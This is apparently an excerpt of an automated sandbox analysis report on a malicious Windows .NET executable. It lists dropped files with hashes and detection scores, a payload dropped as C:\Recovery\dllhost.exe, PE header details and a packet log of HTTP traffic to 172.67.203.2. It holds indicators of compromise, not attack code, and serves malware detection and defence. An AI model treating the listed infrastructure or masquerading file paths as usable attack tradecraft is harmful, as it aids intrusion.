                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  • Antivirus: Virustotal, Detection: 11%, Browse
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):24064
                                                  Entropy (8bit):5.492504448438552
                                                  Encrypted:false
                                                  SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                  MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                  SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                  SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                  SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 46%
                                                  • Antivirus: Virustotal, Detection: 41%, Browse
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.243856189774724
                                                  Encrypted:false
                                                  SSDEEP:3:xI43SW5n:t3hn
                                                  MD5:728DDB345602EA2B8AB3FC782C5C74BF
                                                  SHA1:03DD6C7DB953D3DB205554518481EEED780AE58E
                                                  SHA-256:58DEA24030D1726EF6DCE7BC4BDFFF1D29D324742D39BA5ABFAD25FE4B3777F3
                                                  SHA-512:3ECF23A560DC4E243E2DCE67543F29257DF105D17728AD190CEC50DCB0E40D15EB5143BAD2AF49E13CAD5EBA966375497C4C32814FB349D063BAAAFE0A92F017
                                                  Malicious:false
                                                  Preview:lygmcbWwVBSWjjQNuffnSldZ9
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):22016
                                                  Entropy (8bit):5.41854385721431
                                                  Encrypted:false
                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                  • Antivirus: Virustotal, Detection: 7%, Browse
                                                  Process:C:\Recovery\dllhost.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.519109060441589
                                                  Encrypted:false
                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  • Antivirus: Virustotal, Detection: 11%, Browse
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  • Antivirus: Virustotal, Detection: 29%, Browse
                                                  Process:C:\Recovery\dllhost.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):24064
                                                  Entropy (8bit):5.492504448438552
                                                  Encrypted:false
                                                  SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                  MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                  SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                  SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                  SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 46%
                                                  • Antivirus: Virustotal, Detection: 41%, Browse
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  • Antivirus: Virustotal, Detection: 22%, Browse
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with very long lines (391), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):391
                                                  Entropy (8bit):5.843671783476856
                                                  Encrypted:false
                                                  SSDEEP:12:qwBV3kHpKY8YbuMlLSUCnrgUv7OGKGVc3/hHvpLJ:q6V3UpeYuMF6gUjOgMZHn
                                                  MD5:85BD59116005CEB0B93E1AC9000B7A1B
                                                  SHA1:226CA798921F3F4D57FA4A88774AF35512A3FA15
                                                  SHA-256:2061DA69D32BA2B0D1FC8E00179FC1C765894A59E6B91D22634B5B5C74149E2B
                                                  SHA-512:66B6C4169BE465AD4BAB06632D1C7480C24B8929098B8F091E2B4A6E90EE24EF56212695FE414A084EF6A7764306BF6630D92AFDD024D616988789ACC168DB95
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1879040
                                                  Entropy (8bit):7.521285879994311
                                                  Encrypted:false
                                                  SSDEEP:49152:w1AosHXIlkL2txuvX0u4m5r9HOGlJSbYYWl3:w1py/om5r9OhbY9
                                                  MD5:64483E064AA921F94D5B254601DB7C97
                                                  SHA1:7BCEE1F1F12C6CF5707B99F093E639F13FF77338
                                                  SHA-256:C5F0A463FDC02FA0A127A4547BB1DCAF06C679A08C0C9E3452B64AC4101CA50D
                                                  SHA-512:87BAEAB97AD2629661CDCC2C1F1DCA6E40EF102D5E2304E43A96588554E920F6310611C33864883680CBBC3086FCAD50BE304098C1A485C0002890AB5642A93F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with very long lines (574), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):574
                                                  Entropy (8bit):5.88845022074
                                                  Encrypted:false
                                                  SSDEEP:12:vM6ZiIdJm1QlR9szgMlUNhFJkB6NzcZEKCXIadgN:v0IZmzgMlUZKBwoEKwIag
                                                  MD5:B3040E94DB5D3B6220B5B9FDF801712F
                                                  SHA1:11EF8BE8FCAE884CB0C71D24C0C27FAA96499738
                                                  SHA-256:D9354A6AC3160F6B33B4C3E6999FC517176C24AF2BE6CFA702A68B5FE75D951F
                                                  SHA-512:F61EA4D709ED1FB14B4448821343479BC4B64371AB733C18AE6D227FF6BDB59229CC6C0553FDFA06F94383BF1CA2166D9BB2F300FE1E7A68717DA895164F658F
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1879040
                                                  Entropy (8bit):7.521285879994311
                                                  Encrypted:false
                                                  SSDEEP:49152:w1AosHXIlkL2txuvX0u4m5r9HOGlJSbYYWl3:w1py/om5r9OhbY9
                                                  MD5:64483E064AA921F94D5B254601DB7C97
                                                  SHA1:7BCEE1F1F12C6CF5707B99F093E639F13FF77338
                                                  SHA-256:C5F0A463FDC02FA0A127A4547BB1DCAF06C679A08C0C9E3452B64AC4101CA50D
                                                  SHA-512:87BAEAB97AD2629661CDCC2C1F1DCA6E40EF102D5E2304E43A96588554E920F6310611C33864883680CBBC3086FCAD50BE304098C1A485C0002890AB5642A93F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
                                                  Process:C:\Users\user\Desktop\UuIspZT5b6.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):1224
                                                  Entropy (8bit):4.435108676655666
                                                  Encrypted:false
                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                  Malicious:false
                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4608
                                                  Entropy (8bit):3.90994357612001
                                                  Encrypted:false
                                                  SSDEEP:48:63pfPtSM7Jt8Bs3FJsdcV4MKe27CsvqBHyOulajfqXSfbNtm:qP5Pc+Vx9MCsvkccjRzNt
                                                  MD5:B5C444B59130533A63B41E962AEA2AF3
                                                  SHA1:336456D697B88F5D0B5D86F934B2262CE3EB4BAA
                                                  SHA-256:56093F784582C3A2C4121224ECE7B667C5EBE75681D55268F419E95F8DCB00A3
                                                  SHA-512:C6FA5F58873A2EA224D2CC361E6B41B20FCC3806D3FF65DF983D079BB39D23C82D3EC5F55C314D051F8D2149D5944EBC2D9000C9927DAAFBD270074D1A213A16
                                                  Malicious:true
                                                  Process:C:\Windows\System32\w32tm.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):151
                                                  Entropy (8bit):4.789858084314967
                                                  Encrypted:false
                                                  SSDEEP:3:VLV993J+miJWEoJ8FXhIjEKNWDIvvpYU3vj:Vx993DEUqK+ISUL
                                                  MD5:D61623E589188C90E12D7D89B0F1BB3C
                                                  SHA1:97DC41BD65C11F3B01587CABBA9D9F18CA47AA16
                                                  SHA-256:9D6B093FDD06232F231C140F11E09B0E1F7DE7CAE1E1C8CBE2C0659B0AB27642
                                                  SHA-512:2B14ADF4DAAF8EFFAFDDD72C66597B955E59D74CDF38955728E25033E03EE673FBE355167BD9C6B71A86BDB0293C715B7675B91635B4BA5A8899439FF459487F
                                                  Malicious:false
                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 01/08/2024 03:17:18..03:17:18, error: 0x80072746.03:17:23, error: 0x80072746.
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.521285879994311
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:UuIspZT5b6.exe
                                                  File size:1'879'040 bytes
                                                  MD5:64483e064aa921f94d5b254601db7c97
                                                  SHA1:7bcee1f1f12c6cf5707b99f093e639f13ff77338
                                                  SHA256:c5f0a463fdc02fa0a127a4547bb1dcaf06c679a08c0c9e3452b64ac4101ca50d
                                                  SHA512:87baeab97ad2629661cdcc2c1f1dca6e40ef102d5e2304e43a96588554e920f6310611c33864883680cbbc3086fcad50be304098c1a485c0002890ab5642a93f
                                                  SSDEEP:49152:w1AosHXIlkL2txuvX0u4m5r9HOGlJSbYYWl3:w1py/om5r9OhbY9
                                                  TLSH:96959E2A66A24E33C2652B328597413D9291D7372612EF1F361F20D36D07BF58AB71E3
                                                  Icon Hash:90cececece8e8eb0
                                                  Entrypoint:0x5cc39e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6696D1C9 [Tue Jul 16 20:02:17 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  Name                                  Virtual Address  Virtual Size  Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT          0x1cc350         0x4b          .text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE        0x1ce000         0x320         .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC       0x1d0000         0xc           .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                  Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                                                  .text   0x2000           0x1ca3a4      0x1ca400  a6bb70be20bb4329aa75b2dad08cf595  False     0.7739510876977632  data       7.524831609244645    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc   0x1ce000         0x320         0x400     449a56dc03ed673b0449bed8349ccbf0  False     0.3544921875        data       2.6537284131589467   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .reloc  0x1d0000         0xc           0x200     c092225fdaa605bb59ea50ecd5f6db95  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  Name        RVA       Size   Type  Language  Country  ZLIB Complexity
                                                  RT_VERSION  0x1ce058  0x2c8  data                     0.46207865168539325
                                                  DLL          Import
                                                  mscoree.dll  _CorExeMain
                                                  Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                  Aug 1, 2024 07:37:27.196233988 CEST8049736172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.196567059 CEST8049730172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.196624041 CEST4973680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.196661949 CEST4973080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.196754932 CEST4973680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.199321985 CEST4973680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.199857950 CEST8049733172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.200047970 CEST4973380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.201654911 CEST8049736172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.246171951 CEST8049736172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.396800995 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.401935101 CEST8049737172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.402136087 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.402259111 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.407388926 CEST8049737172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.576598883 CEST8049736172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.579154968 CEST4973680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.755934000 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:27.761130095 CEST8049737172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:27.855858088 CEST8049737172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.037168026 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.094624043 CEST8049737172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.168256998 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.277715921 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.278536081 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.283906937 CEST8049738172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.284009933 CEST8049737172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.284131050 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.284131050 CEST4973780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.284131050 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.290313959 CEST8049738172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.630892992 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.636234045 CEST8049738172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.729237080 CEST8049738172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.943381071 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.946094990 CEST8049738172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:28.946288109 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:28.982858896 CEST8049738172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:29.129616976 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:29.130883932 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:29.134763956 CEST8049740172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:29.135159969 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:29.135257959 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:29.141453028 CEST8049740172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:29.490343094 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:29.495759964 CEST8049740172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:29.601708889 CEST8049740172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:29.729964018 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:29.894970894 CEST8049740172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.037194967 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.148761988 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.149401903 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.154402018 CEST8049740172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.154413939 CEST8049742172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.154490948 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.154578924 CEST4974080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.154596090 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.159342051 CEST8049742172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.505877018 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.511138916 CEST8049742172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.608850002 CEST8049742172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.693253994 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.858093023 CEST8049742172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:30.988986969 CEST4973880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.997405052 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:30.998298883 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.002799034 CEST8049742172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.003056049 CEST4974280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.003621101 CEST8049743172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.003865004 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.003865004 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.008740902 CEST8049743172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.349776983 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.355061054 CEST8049743172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.448272943 CEST8049743172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.537141085 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.726249933 CEST8049743172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.833883047 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.854752064 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.855628014 CEST4974480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.860133886 CEST8049743172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.860220909 CEST4974380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.860672951 CEST8049744172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.860893965 CEST4974480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.860893965 CEST4974480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.865895033 CEST8049744172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.928802967 CEST4974480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.929277897 CEST4974580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.934380054 CEST8049745172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.934628963 CEST4974580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.934628963 CEST4974580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:37:31.939671040 CEST8049745172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:37:31.978306055 CEST8049744172.67.203.2192.168.2.4
